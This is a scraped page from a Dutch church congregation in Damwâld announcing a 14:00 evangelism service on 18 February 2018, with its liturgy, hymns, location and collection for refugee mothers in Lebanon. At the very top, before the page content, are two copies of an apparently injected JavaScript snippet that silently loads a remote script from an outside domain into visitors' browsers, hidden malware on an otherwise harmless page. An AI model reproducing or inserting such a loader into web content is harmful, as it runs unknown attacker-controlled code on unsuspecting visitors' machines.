;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 18 februari 2018 14:00 uur - PKN Damwâld
zondag 18 februari 2018
14:00 uur
Evangelisatiedienst m.m.v. de 'Double Brothers'

Kerkdienst zondag 18 februari 2018 14:00 uur

Thema: "Een aanstekelijk leven"

Informatie

Voorganger:Ds. S. Boukes
Organist:Jaap van der Horn
Thema:"Een aanstekelijk leven"
Mededeling:Evangelisatiedienst m.m.v. de 'Double Brothers'
Liturgie
Lied voor de dienst ELB 226
Welkom en mededelingen
Intochtslied : Gez.21:1,3,7
Stil gebed,Aanvangswoorden en groet
Gedachtenis van Aant Wiebe Rozema
We zingen: ELB 413:1,4
Waarover het vanmiddag gaat (het probleem)
Gedicht
We luisteren naar een nummer van The Double Brothers .
Gebed
We lezen: Mat.5:3-10 en 14-16
We zingen: ELB 390:1,2,4
Uitleg van Jezus' woorden .
We zingen: ELB 184:1,3,4
De praktijk .
We luisteren naar een nummer van The Double Brothers .
We zingen: Gez.473:1,2,3,4,10
Dankgebed
Collecte
Slotlied ELB 501
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Bijlagen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Collecte informatie
Eerste collecte: 40-Dagentijd: Met je kinderen op de vlucht - IOCC Libanon

Onder de vier miljoen Syriërs die hun land zijn ontvlucht, bevinden zich veel moeders met kinderen. Uitgeput zijn ze neergestreken in de Bekaa-vallei in Oost-Libanon. Hun kinderen zijn moe, bang, ziek of zelfs ondervoed. Onder erbarmelijke omstandigheden proberen deze moeders hun kinderen liefdevol te verzorgen en te beschermen. Partnerorganisatie IOCC ( International Orthodox Christian Charities) ondersteunt gevluchte moeders daarbij. Met verloskundige zorg, voorlichting over borstvoeding, bijvoeding voor ondervoede kinderen en gezondheidsvoorlichting redden bevlogen medewerkers van IOCC niet alleen kinderlevens, maar helpen ze moeders om in alle onzekerheid hun kinderen toch de juiste zorg te kunnen bieden.

Tweede collecte: Kerk
Uitganscollecte: Kerk